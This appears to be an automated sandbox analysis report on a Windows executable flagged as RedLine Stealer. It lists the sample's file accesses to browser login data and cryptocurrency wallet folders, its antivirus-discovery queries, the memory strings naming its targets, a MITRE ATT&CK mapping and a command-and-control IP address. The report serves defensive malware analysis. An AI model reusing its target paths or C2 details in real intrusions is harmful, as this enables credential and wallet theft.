Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Fonts\DUBAI-LIGHT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Fonts\DUBAI-BOLD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Users\user\Desktop\ljMiHZ8MwZ.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: ljMiHZ8MwZ.exe, 00000002.00000002.1883517176.00000000066BE000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct

Stealing of Sensitive Information

Yara detected RedLine Stealer

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 0.2.ljMiHZ8MwZ.exe.41f8af0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ljMiHZ8MwZ.exe.4210910.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.ljMiHZ8MwZ.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ljMiHZ8MwZ.exe.4210910.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ljMiHZ8MwZ.exe.41f8af0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.1874957650.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1741731894.00000000041F8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: ljMiHZ8MwZ.exe PID: 7348, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ljMiHZ8MwZ.exe PID: 7532, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: ljMiHZ8MwZ.exe, 00000000.00000002.1741731894.00000000041F8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: [^\u0020-\u007F]ProcessIdname_on_cardencrypted_valuehttps://ipinfo.io/ip%appdata%\logins{0}\FileZilla\recentservers.xml%appdata%\discord\Local Storage\leveldb\tdataAtomicWalletv10/C \EtFile.IOhereuFile.IOm\walFile.IOletsESystem.UItherSystem.UIeumElectrum[AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}profiles\Windows\valueexpiras21ation_moas21nth
Source: ljMiHZ8MwZ.exe, 00000002.00000002.1876392407.0000000003000000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: $^q1C:\Users\user\AppData\Roaming\Electrum\wallets\*
Source: ljMiHZ8MwZ.exe, 00000000.00000002.1741731894.00000000041F8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: user.config{0}\FileZilla\sitemanager.xmlcookies.sqlite\Program Files (x86)\configRoninWalletdisplayNamehost_key\Electrum\walletsName\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program Data\coMANGOokies.sqMANGOlitessfnExodusDisplayVersion%localappdata%\GuildWalletOpHandlerenVPHandlerN ConHandlernect%DSK_23%YoroiWalletcmdOpera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWalletWeb DataSteamPathwaasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\SteamLogin DataID: isSecureNoDefrdDefVPNDefwaasflletasfMewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Process Where SessionId='nlbmnnijcnlegkjjpcfjclmcfggfefdmnkddgncdjgjfcddamfgcmfnlhccnimig\coFile.IOm.libeFile.IOrty.jFile.IOaxFile.IOxnamefnjhmkhhmkbjkkabndcnnogagogbneecfhilaheimglignddkjgofkcbgekhenbhProfile_Unknowncard_number_encrypted, Name: AppData\Roaming\TReplaceokReplaceenReplaces.tReplacext //settString.Replaceing[@name=\UString.Replacesername\]/vaString.ReplacelueNWinordVWinpn.eWinxeWinhostmoz_cookiesUser Datawindows-1251, CommandLine: \ExodusDisplayNameexpiry.vstring.ReplacedfJaxxpathBSJB
Source: ljMiHZ8MwZ.exe, 00000000.00000002.1741731894.00000000041F8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: user.config{0}\FileZilla\sitemanager.xmlcookies.sqlite\Program Files (x86)\configRoninWalletdisplayNamehost_key\Electrum\walletsName\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program Data\coMANGOokies.sqMANGOlitessfnExodusDisplayVersion%localappdata%\GuildWalletOpHandlerenVPHandlerN ConHandlernect%DSK_23%YoroiWalletcmdOpera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWalletWeb DataSteamPathwaasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\SteamLogin DataID: isSecureNoDefrdDefVPNDefwaasflletasfMewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Process Where SessionId='nlbmnnijcnlegkjjpcfjclmcfggfefdmnkddgncdjgjfcddamfgcmfnlhccnimig\coFile.IOm.libeFile.IOrty.jFile.IOaxFile.IOxnamefnjhmkhhmkbjkkabndcnnogagogbneecfhilaheimglignddkjgofkcbgekhenbhProfile_Unknowncard_number_encrypted, Name: AppData\Roaming\TReplaceokReplaceenReplaces.tReplacext //settString.Replaceing[@name=\UString.Replacesername\]/vaString.ReplacelueNWinordVWinpn.eWinxeWinhostmoz_cookiesUser Datawindows-1251, CommandLine: \ExodusDisplayNameexpiry.vstring.ReplacedfJaxxpathBSJB
Source: ljMiHZ8MwZ.exe, 00000002.00000002.1876392407.0000000003000000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: \Ethereum\wallets
Source: ljMiHZ8MwZ.exe, 00000000.00000002.1741731894.00000000041F8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: user.config{0}\FileZilla\sitemanager.xmlcookies.sqlite\Program Files (x86)\configRoninWalletdisplayNamehost_key\Electrum\walletsName\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program Data\coMANGOokies.sqMANGOlitessfnExodusDisplayVersion%localappdata%\GuildWalletOpHandlerenVPHandlerN ConHandlernect%DSK_23%YoroiWalletcmdOpera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWalletWeb DataSteamPathwaasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\SteamLogin DataID: isSecureNoDefrdDefVPNDefwaasflletasfMewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Process Where SessionId='nlbmnnijcnlegkjjpcfjclmcfggfefdmnkddgncdjgjfcddamfgcmfnlhccnimig\coFile.IOm.libeFile.IOrty.jFile.IOaxFile.IOxnamefnjhmkhhmkbjkkabndcnnogagogbneecfhilaheimglignddkjgofkcbgekhenbhProfile_Unknowncard_number_encrypted, Name: AppData\Roaming\TReplaceokReplaceenReplaces.tReplacext //settString.Replaceing[@name=\UString.Replacesername\]/vaString.ReplacelueNWinordVWinpn.eWinxeWinhostmoz_cookiesUser Datawindows-1251, CommandLine: \ExodusDisplayNameexpiry.vstring.ReplacedfJaxxpathBSJB
Source: ljMiHZ8MwZ.exe, 00000002.00000002.1876392407.0000000003000000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Ethereum
Source: ljMiHZ8MwZ.exe, 00000002.00000002.1876392407.0000000003000000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: $^q5C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\*

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	File opened: C:\Users\user\AppData\Roaming\atomic\	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	File opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\	Jump to behavior

Source: Yara match	File source: 0.2.ljMiHZ8MwZ.exe.41f8af0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ljMiHZ8MwZ.exe.4210910.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.ljMiHZ8MwZ.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ljMiHZ8MwZ.exe.4210910.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ljMiHZ8MwZ.exe.41f8af0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.1874957650.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1741731894.00000000041F8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: ljMiHZ8MwZ.exe PID: 7348, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ljMiHZ8MwZ.exe PID: 7532, type: MEMORYSTR

Remote Access Functionality

Yara detected RedLine Stealer

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 0.2.ljMiHZ8MwZ.exe.41f8af0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ljMiHZ8MwZ.exe.4210910.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.ljMiHZ8MwZ.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ljMiHZ8MwZ.exe.4210910.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ljMiHZ8MwZ.exe.41f8af0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.1874957650.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1741731894.00000000041F8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: ljMiHZ8MwZ.exe PID: 7348, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ljMiHZ8MwZ.exe PID: 7532, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	221 Windows Management Instrumentation	1 DLL Side-Loading	11 Process Injection	1 Masquerading	1 OS Credential Dumping	231 Security Software Discovery	Remote Services	1 Archive Collected Data	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Disable or Modify Tools	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	3 Data from Local System	11 Non-Standard Port	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	241 Virtualization/Sandbox Evasion	Security Account Manager	241 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	11 Process Injection	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	12 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	2 Obfuscated Files or Information	LSA Secrets	113 System Information Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	12 Software Packing	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
ljMiHZ8MwZ.exe	35%	Virustotal		Browse
ljMiHZ8MwZ.exe	66%	ReversingLabs	ByteCode-MSIL.Trojan.Remcos
ljMiHZ8MwZ.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
http://45.137.22.250:55615	0%	Avira URL Cloud	safe
https://api.ipify.orgcookies//settinString.Removeg	0%	Avira URL Cloud	safe
http://45.137.22.250:5	0%	Avira URL Cloud	safe
45.137.22.250:55615	0%	Avira URL Cloud	safe
http://45.137.22.250:55615/	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
api.ip.sb	unknown	unknown	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
45.137.22.250:55615	true	Avira URL Cloud: safe	unknown
http://45.137.22.250:55615/	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	tmp96FD.tmp.2.dr, tmpD0D4.tmp.2.dr, tmpD0B3.tmp.2.dr, tmp971F.tmp.2.dr, tmp9762.tmp.2.dr, tmp9741.tmp.2.dr, tmp9752.tmp.2.dr, tmp9731.tmp.2.dr, tmp96FE.tmp.2.dr, tmpD103.tmp.2.dr, tmp970E.tmp.2.dr, tmp9720.tmp.2.dr	false		high
http://www.fontbureau.com/designersG	ljMiHZ8MwZ.exe, 00000000.00000002.1743316362.0000000007322000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	tmp96FD.tmp.2.dr, tmpD0D4.tmp.2.dr, tmpD0B3.tmp.2.dr, tmp971F.tmp.2.dr, tmp9762.tmp.2.dr, tmp9741.tmp.2.dr, tmp9752.tmp.2.dr, tmp9731.tmp.2.dr, tmp96FE.tmp.2.dr, tmpD103.tmp.2.dr, tmp970E.tmp.2.dr, tmp9720.tmp.2.dr	false		high
http://www.fontbureau.com/designers/?	ljMiHZ8MwZ.exe, 00000000.00000002.1743316362.0000000007322000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.founder.com.cn/cn/bThe	ljMiHZ8MwZ.exe, 00000000.00000002.1743316362.0000000007322000.00000004.00000800.00020000.00000000.sdmp	false		high
